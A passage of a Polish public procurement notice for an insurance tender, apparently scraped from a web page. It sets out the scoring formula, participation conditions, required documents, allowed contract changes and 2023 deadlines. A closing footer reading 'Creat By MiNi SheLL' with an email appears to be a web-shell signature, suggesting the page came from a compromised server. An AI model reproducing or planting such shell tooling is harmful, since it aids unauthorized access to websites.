w tabeli puste, Zamawiający uzna, iż Wykonawca nie przyjął klauzuli i do obliczeń przyjmie dla tej pozycji wartość zero.<br/>22.2.4.	Każda klauzula fakultatywna w przypadku przyjęcia, otrzyma odpowiednio wskazaną poniżej liczbę punktów:<br/><br/>Zadanie II<br/>Klauzula punktowana nr 5	50 pkt<br/>Klauzula punktowana nr 6	25 pkt<br/>Klauzula punktowana nr 7	25 pkt<br/>Łącznie 100 pkt<br/><br/><br/>22.3.	Oferty nieodrzucone będą oceniane wg wzoru:<br/>LP = (Cmin : CO x 100 pkt. x 0,90) + (WO x 0,10)<br/>gdzie:<br/>LP – całkowita liczba punktów przyznanych ocenianej ofercie,<br/>Cmin – najniższa cena oferty spośród ofert podlegających ocenie,<br/>CO – cena oferty ocenianej,<br/>WO – łączna liczba punktów za fakultatywne warunki ubezpieczenia przyjęte <br/>przez Wykonawcę w ocenianej ofercie.<br/><br/><br/>22.4.	Punkty w poszczególnych kryteriach będą wyliczane z dokładnością do dwóch miejsc po przecinku.<br/>22.5.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta otrzyma największą całkowitą liczbę punktów (LP).<br/>22.6.	Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z niższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">PREFEROWANE WARUNKI UBEZPIECZENIA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 10.1.	O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy:<br/>10.1.1.	Nie podlegają wykluczeniu;<br/>10.1.2.	Spełniają warunki udziału w postępowaniu. <br/>10.2.	Zamawiający wyznacza następujące warunki udziału w postępowaniu:<br/>10.2.1.	Posiadanie zdolności do występowania w obrocie gospodarczym. Warunek ten uznaje się za spełniony, jeśli Wykonawcy są wpisani do jednego z rejestrów zawodowych lub handlowych w kraju, w którym mają siedzibę lub miejsce zamieszkania, co w przypadku Wykonawców mających siedzibę na terenie RP oznacza, że są w pisani do Krajowego Rejestru Sądowego.<br/>10.2.2.	Posiadanie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej. Warunek ten uznaje się za spełniony, jeśli Wykonawcy posiadają zezwolenie na wykonywanie działalności ubezpieczeniowej w zakresie ubezpieczeń Działu II Załącznika do Ustawy z dnia 11.09.2015 r. o działalności ubezpieczeniowej i reasekuracyjnej (Dz.U. z 2021 poz. 1130) w zakresie nie mniejszym, niż opisany w niniejszej SWZ.<br/>10.3.	Sytuacja ekonomiczna lub finansowa - Zamawiający nie stawia warunku w tym zakresie.<br/>10.4.	Zdolności techniczne lub zawodowe - Zamawiający nie stawia warunku w tym zakresie <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">12.2.4.1.	Wstępne oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu i braku podstaw do wykluczenia z postępowania, stanowiące Załącznik nr 6 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 12.2.	Oferta musi zawierać co najmniej:<br/>12.2.1.	Wypełniony Formularz oferty, stanowiący Załącznik nr 2 do SWZ.<br/>12.2.2.	Wypełniony Formularz cenowy, stanowiący Załącznik nr 3a (Zadanie I) i/lub Załącznik nr 3b (Zadanie II) do SWZ. <br/>12.2.3.	Pełnomocnictwo lub ciąg Pełnomocnictw (zgodnie z wymogami określonymi w Pkt. 15 SWZ). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 12.2.4.2.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego:<br/>a)	Ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>b) Każdy z Wykonawców, wspólnie ubiegających się o udzielenie zamówienia publicznego zobligowany jest do złożenia Oświadczenia, stanowiącego Załącznik nr 6 do SWZ, potwierdzającego, że spełnia warunki udziału w postępowaniu i nie podlega wykluczeniu.<br/>c)	Członkowie konsorcjum zgodnie z art. 445 ustawy Pzp ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>12.2.4.3.	Dokumenty wymagane od podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy Pzp zostały określone w pkt. 13.<br/>12.2.4.4.	Dokumenty wymagane od podwykonawcy, niebędącego podmiotem udostępniającym zasoby zostały określone w pkt. 14. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 27.2.	Zamawiający przewiduje możliwość zmiany postanowień Umowy, zawartej z Wykonawcą, w ramach niniejszego postępowania, w zakresie:<br/>27.2.1. Przedmiotu zamówienia w zakresie określonym w punkcie 27.3.<br/>27.2.2.	Terminu realizacji zamówienia<br/>27.2.3.	Wynagrodzenia Wykonawcy, przy czym nie może ono ulec zwiększeniu o więcej niż 20%.<br/>27.3.	Zmiana ta może dotyczyć:<br/>27.3.1.	wysokości ostatecznej składki należnej Wykonawcy za cały okres udzielanej ochrony ubezpieczeniowej, z poszanowaniem postanowień zapisów umowy o wykonanie zamówienia. Zmiana ta jest dopuszczalna poprzez dodatkowe naliczenia składek w przypadku nabycia nowych pojazdów/mienia lub zwrotu składek w przypadku zbycia środków transportu/mienia, poprzez wystawienie przez Zamawiającego nowych polis lub Aneksów do polis, na wniosek Brokera<br/>27.3.2.	zmiany obowiązujących przepisów prawa powodującej konieczność dostosowania do nich warunków umowy. Zmiana dokonywana na wniosek składany przez brokera do Wykonawcy oraz wystawienie Aneksu do polisy przez Wykonawcę.<br/>27.3.3.	zawężenia zakresu prowadzonej działalności albo rezygnacji Ubezpieczającego z ochrony ubezpieczeniowej dla określonych ryzyk lub określonych składników majątku, wymagających ograniczenia zakresu ochrony ubezpieczeniowej i aktualizacji składki. Zmiana dokonywana na wniosek składany przez brokera do Wykonawcy oraz wystawienie Aneksu do polisy przez Wykonawcę<br/>27.3.4.	zwiększenia zakresu prowadzonej działalności albo potrzeby objęcia ochroną ubezpieczeniową określonych ryzyk lub określonych składników majątku własnego lub powierzonego powodujące konieczność rozszerzenia ochrony ubezpieczeniowej i aktualizacji składki. Zmiana dokonywana na wniosek składany przez brokera do Wykonawcy oraz wystawienie Aneksu do polisy przez Wykonawcę<br/>27.3.5.	uzupełnienia sumy ubezpieczenia/gwarancyjnej, limitu po wypłacie odszkodowania. Zmiana dokonywana na wniosek składany przez brokera do Wykonawcy oraz wystawienie Aneksu do polisy przez Wykonawcę.<br/>27.3.6.	zmian dotyczących Ubezpieczonych objętych umową, polegających na powstawaniu nowych jednostek, przekształceniach, połączeniach, likwidacji jednostek istniejących, zmianach własnościowych lub ich formy prawnej. Zmiana dokonywana na wniosek składany przez brokera do Wykonawcy oraz wystawienie Aneksu do polisy przez Wykonawcę.<br/>27.3.7.	obowiązku ubezpieczenia wynikającego z zawartych umów najmu, dzierżawy, leasingu lub innych o podobnym charakterze, Zmiana dokonywana na wniosek składany przez brokera do Wykonawcy oraz wystawienie Aneksu do polisy przez Wykonawcę.<br/>27.3.8.	Skrócenia okresu ochrony w związku z wyrównaniem okresów ubezpieczenia. Zmiana dokonywana na wniosek składany przez brokera do Wykonawcy oraz wystawienie Aneksu do polisy przez Wykonawcę<br/>27.3.9.	przedłużenia terminu wykonania zamówienia, z zastrzeżeniem, że przedłużenie takie nie będzie dłuższe niż 3 miesiące, a jego konieczność wynika z przyczyn technicznych lub braku możliwości przeprowadzenia nowego postępowania, zgodnie z przepisami ustawy Pzp, zapewniającego ciągłość ochrony ubezpieczeniowej. Zmiana dokonywana na wniosek składany przez brokera do Wykonawcy oraz wystawienie Aneksu do polisy przez Wykonawcę<br/>27.4.	Wszelkie zmiany i uzupełnienia treści umowy wymagają pisemnej zgody pod rygorem nieważności i będą dopuszczalne w granicach i unormowaniach Prawa zamówień publicznych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-24 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-11-24 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com